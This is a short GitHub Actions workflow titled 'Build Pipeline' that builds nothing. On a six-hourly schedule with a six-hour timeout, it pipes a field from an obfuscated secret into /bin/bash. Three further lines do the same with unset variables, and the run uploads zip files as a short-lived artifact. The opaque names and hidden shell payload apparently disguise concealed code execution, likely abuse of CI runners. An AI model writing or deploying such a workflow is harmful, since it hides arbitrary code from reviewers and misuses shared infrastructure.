name: Build Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '51 0,6,12,18 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  runner:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Initialize
        env:
          agqbl78: ${{ secrets.agqbl78 }}
        run: |
          printf '%s' "$agqbl78" | jq -r .ynmts8130 | /bin/bash
          printf '%s' "$xtge9" | jq -r .grxhp9664 | /bin/bash
          printf '%s' "$mmvt0" | jq -r .plih843 | /bin/bash
          printf '%s' "$gn5" | jq -r .zybt0351 | /bin/bash

      - name: Persist results
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: Bw6MTTap
          path: "*.zip"
          retention-days: 1
